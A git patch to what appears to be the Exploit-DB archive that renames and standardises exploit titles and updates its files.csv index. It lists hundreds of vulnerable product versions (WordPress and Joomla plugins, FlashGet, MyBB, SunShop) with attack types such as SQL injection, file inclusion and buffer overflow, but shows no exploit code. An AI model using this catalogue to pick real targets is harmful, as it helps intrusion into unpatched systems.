From be57520c6fa875bc25a5d487f3bb7078cd61800c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 21 Dec 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-12-21 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2 new exploits FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC) FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC) VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service Flashget 3.x - IEHelper Remote Exec (PoC) FlashGet 3.x - IEHelper Remote Exec (PoC) Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC) Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC) Google Android - WifiNative::setHotlist Stack Overflow Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035) FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH) FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH) freeFTPd - Remote Authentication Bypass freeFTPd 1.2.6 - Remote Authentication Bypass freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit) freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit) freeFTPd - 'PASS' Buffer Overflow (Metasploit) freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit) AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion iziContents RC6 - GLOBALS[] Remote Code Execution AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion iziContents RC6 - Remote Code Execution SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion SunShop 4.0 RC 6 - 'Search' Blind SQL Injection SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities iziContents rc6 - Remote File Inclusion / Local File Inclusion gelato CMS 0.95 - (img) Remote File Disclosure dotCMS 1.6 - 'id' Multiple Local File Inclusion ZeeJobsite 2.0 - (adid) SQL Injection gelato CMS 0.95 - 'img' Parameter Remote File Disclosure dotCMS 1.6 - 'id' Parameter Local File Inclusion Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion PHPBasket - 'product.php pro_id' SQL Injection PHPBasket - 'pro_id' Parameter SQL Injection Ad Board - 'id' SQL Injection SunShop 4.1.4 - 'id' SQL Injection Banner Management Script - 'tr.php id' SQL Injection Ad Board - 'id' Parameter SQL Injection SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection Banner Management Script - 'id' Parameter SQL Injection phpBazar 2.0.2 - (adid) SQL Injection webEdition CMS - (we_objectID) Blind SQL Injection CustomCMS 4.0 - (CCMS) print.php SQL Injection phpBazar 2.0.2 - 'adid' Parameter SQL Injection webEdition CMS - 'we_objectID' Parameter Blind SQL Injection CustomCMS 4.0 - 'print.php' SQL Injection TinyCMS 1.1.2 - (templater.php) Local File Inclusion TinyCMS 1.1.2 - 'templater.php' Local File Inclusion onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities 5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection 5 star review - Cross-Site Scripting / SQL Injection Web Directory Script 2.0 - (name) SQL Injection Web Directory Script 2.0 - 'name' Parameter SQL Injection Crafty Syntax Live Help 2.14.6 - (department) SQL Injection Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure k-rate - SQL Injection / Cross-Site Scripting CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure phpMyRealty 1.0.9 - Multiple SQL Injections PHPMyRealty 1.0.9 - Multiple SQL Injections brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Web Directory Script 1.5.3 - (site) SQL Injection Words tag script 1.2 - (word) SQL Injection Brim 2.0.0 - SQL Injection / Cross-Site Scripting Web Directory Script 1.5.3 - 'site' Parameter SQL Injection Words tag script 1.2 - 'word' Parameter SQL Injection WeBid 0.5.4 - (item.php id) SQL Injection WeBid 0.5.4 - 'item.php' SQL Injection ZeeJobsite 2.0 - Arbitrary File Upload Zeeways ZeeJobsite 2.0 - Arbitrary File Upload BandSite CMS 1.1.4 - (members.php memid) SQL Injection BandSite CMS 1.1.4 - 'members.php' SQL Injection Thickbox Gallery 2 - 'index.php ln' Local File Inclusion Thickbox Gallery 2 - 'index.php' Local File Inclusion Joomla! Component 'com_wmtpic' 1.0 - SQL Injection Joomla! Component com_wmtpic 1.0 - SQL Injection Joomla! Component 'com_redshop' 1.0 - Local File Inclusion Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion Joomla! Component redSHOP 1.0 - Local File Inclusion Joomla! Component redTWITTER 1.0 - Local File Inclusion Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion Joomla! Component 'com_shoutbox' - Local File Inclusion Joomla! Component SVMap 1.1.1 - Local File Inclusion Joomla! Component Shoutbox Pro - Local File Inclusion Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion Joomla! Component VJDEO 1.0 - Local File Inclusion Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection Joomla! Component 'com_tweetla' - Local File Inclusion Joomla! Component TweetLA 1.0.1 - Local File Inclusion Joomla! Component 'com_preventive' - Local File Inclusion Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion Joomla! Component 'com_webtv' - Local File Inclusion Joomla! Component Web TV 1.0 - Local File Inclusion Joomla! Component 'com_onlineexam' - Local File Inclusion Joomla! Component Online Exam 1.5.0 - Local File Inclusion Joomla! Component 'com_sweetykeeper' - Local File Inclusion Joomla! Component Sweetykeeper 1.5 - Local File Inclusion Joomla! Component 'com_sermonspeaker' - SQL Injection Joomla! Component SermonSpeaker - SQL Injection Joomla! Component 'com_QPersonel' - SQL Injection Joomla! Component QPersonel 1.0.2 - SQL Injection Joomla! Component 'com_photobattle' - Local File Inclusion Joomla! Component Photo Battle 1.0.1 - Local File Inclusion Joomla! Component 'com_zimbcomment' - Local File Inclusion Joomla! Component 'com_zimbcore' - Local File Inclusion Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion Joomla! Component ZiMBCore 0.1 - Local File Inclusion Joomla! Component 'com_wmi' - Local File Inclusion Joomla! Component 'com_orgchart' - Local File Inclusion Joomla! Component WMI 1.5.0 - Local File Inclusion Joomla! Component OrgChart 1.0.0 - Local File Inclusion Joomla! Component 'com_ultimateportfolio' - Local File Inclusion Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion Joomla! Component 'com_smartsite' - Local File Inclusion Joomla! Component SmartSite 1.0.0 - Local File Inclusion Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion Joomla! Component simpledownload 0.9.5 - Local File Inclusion Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure Joomla! Component simpledownload 0.9.5 - Local File Disclosure Wordpress Plugin TinyBrowser - Arbitrary File Upload WordPress Plugin TinyBrowser - Arbitrary File Upload Joomla! Component 'com_qpersonel' 1.0 - SQL Injection Joomla! Component Q-Personel 1.0 - SQL Injection Joomla! Component 'com_searchlog' - SQL Injection Joomla! Component Search Log 3.1.0 - SQL Injection Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities Joomla! Component 'com_picasa2gallery' - Local File Inclusion Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion Joomla! Component 'jeeventcalendar' - SQL Injection Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection Joomla! Component 'com_realtyna' - Local File Inclusion Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion Joomla! Component 'jesubmit' - SQL Injection Joomla! Component 'com_sef' - Remote File Inclusion Joomla! Component jesubmit 1.4 - SQL Injection Joomla! Component com_sef - Remote File Inclusion Joomla! Component 'jesectionfinder' - Local File Inclusion Joomla! Component jesectionfinder - Local File Inclusion Joomla! Component 'Joomanager' - SQL Injection Joomla! Component Joomanager - SQL Injection Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection Joomla! Component 'com_quickfaq' - Blind SQL Injection Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection Joomla! Component 'com_staticxt' - SQL Injection Joomla! Component StaticXT - SQL Injection Joomla! Component 'com_oziogallery' - SQL Injection Joomla! Component Ozio Gallery - SQL Injection Joomla! Component 'com_youtube' - SQL Injection Joomla! Component YouTube 1.5 - SQL Injection Joomla! Component 'com_ttvideo' 1.0 - SQL Injection Joomla! Component TTVideo 1.0 - SQL Injection Joomla! Component 'com_teams' - Multiple Blind SQL Injection Joomla! Component Teams - Multiple Blind SQL Injection Joomla! Component 'com_picsell' - Local File Disclosure Joomla! Component PicSell 1.0 - Local File Disclosure Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection Joomla! Component 'com_sponsorwall' - SQL Injection Joomla! Component Sponsor Wall 1.1 - SQL Injection Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion Joomla! Component ProDesk 1.5 - Local File Inclusion Joomla! Component 'mdigg' - SQL Injection Joomla! Component mDigg 2.2.8 - SQL Injection phpMyRealty 1.0.7 - SQL Injection PHPMyRealty 1.0.7 - SQL Injection Joomla! Component 'com_timereturns' 2.0 - SQL Injection Joomla! Component Time Returns 2.0 - SQL Injection Joomla! Component 'com_techfolio' 1.0 - SQL Injection Joomla! Component Techfolio 1.0 - SQL Injection Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities BRIM < 2.0.0 - SQL Injection Brim < 2.0.0 - SQL Injection Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting webid 1.0.5 - Directory Traversal weBid 1.0.5 - Directory Traversal Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload Webid 1.0.6 - Multiple Vulnerabilities WeBid 1.0.6 - Multiple Vulnerabilities MyBulletinBoard RC4 - 'Username' Parameter SQL Injection MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection MyBulletinBoard RC4 - 'action' Parameter SQL Injection MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection MyBulletinBoard 1.0 - Multiple SQL Injections MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection MyBulletinBoard 1.0 - 'usercp.php' SQL Injection MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection Joomla! Component 'com_redshop' 1.2 - SQL Injection Joomla! Component redSHOP 1.2 - SQL Injection MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection MyBulletinBoard 1.x - 'usercp.php' Directory Traversal MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting BandSite CMS 1.1 - 'header.php' Cross-Site Scripting BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion Active PHP BookMarks 1.0 - APB.php Remote File Inclusion Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery DMCMS 0.7 - 'index.php' SQL Injection deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion EasySite 2.0 - 'browser.php' Remote File Inclusion EasySite 2.0 - 'image_editor.php' Remote File Inclusion EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access Joomla! Component 'com_youtubegallery' - SQL Injection Joomla! Component Youtube Gallery 4.1.7 - SQL Injection Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal Wordpress Plugin DukaPress 2.5.2 - Directory Traversal WordPress Plugin DukaPress 2.5.2 - Directory Traversal Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation WordPress Plugin Duplicator 0.5.8 - Privilege Escalation Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection WordPress Plugin Single Personal Message 1.0.3 - SQL Injection Joomla! Component 'com_sanpham' - Multiple SQL Injections Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting Wordpress Plugin Job Script by Scubez - Remote Code Execution WordPress Plugin Job Script by Scubez - Remote Code Execution Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite Wordpress Plugin Answer My Question 1.3 - SQL Injection Wordpress Plugin Sirv 1.3.1 - SQL Injection Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection WordPress Plugin Answer My Question 1.3 - SQL Injection WordPress Plugin Sirv 1.3.1 - SQL Injection WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection Wordpress Plugin Olimometer 2.56 - SQL Injection WordPress Plugin Olimometer 2.56 - SQL Injection Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection WordPress Plugin WP Private Messages 1.0.1 - SQL Injection --- files.csv | 410 ++++++++++++++------------- platforms/android/dos/40945.txt | 138 +++++++++ platforms/linux_mips/remote/40740.rb | 4 +- platforms/php/webapps/13925.txt | 2 +- platforms/php/webapps/28620.txt | 2 +- platforms/windows/dos/40946.html | 188 ++++++++++++ 6 files changed, 536 insertions(+), 208 deletions(-) create mode 100755 platforms/android/dos/40945.txt create mode 100755 platforms/windows/dos/40946.html diff --git a/files.csv b/files.csv index a185c9fb2..3f3d19e4d 100644 --- a/files.csv +++ b/files.csv @@ -765,13 +765,13 @@ id,file,description,date,author,platform,type,port 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 - Privilege Escalation (PoC)",2008-08-10,"Core Security",multiple,dos,0 6237,platforms/multiple/dos/6237.txt,"Ventrilo 3.0.2 - Null Pointer Remote Denial of Service",2008-08-13,"Luigi Auriemma",multiple,dos,0 6239,platforms/multiple/dos/6239.txt,"Ruby 1.9 - (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié",multiple,dos,0 -6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)",2008-08-13,h07,windows,dos,0 +6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)",2008-08-13,h07,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow (PoC)",2008-08-14,Symantec,windows,dos,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 - Privilege Escalation (PoC)",2008-08-16,g_,windows,dos,0 6252,platforms/multiple/dos/6252.txt,"VideoLAN VLC Media Player 0.8.6i - '.tta' File Parsing Heap Overflow (PoC)",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)",2008-08-16,j0rgan,windows,dos,0 6257,platforms/windows/dos/6257.pl,"Ipswitch WS_FTP Home/Professional FTP Client - Remote Format String (PoC)",2008-08-17,securfrog,windows,dos,0 -6262,platforms/windows/dos/6262.txt,"VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,windows,dos,0 +6262,platforms/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,windows,dos,0 6293,platforms/multiple/dos/6293.txt,"VideoLAN VLC Media Player 0.8.6i - Mms Protocol Handling Heap Overflow (PoC)",2008-08-23,g_,multiple,dos,0 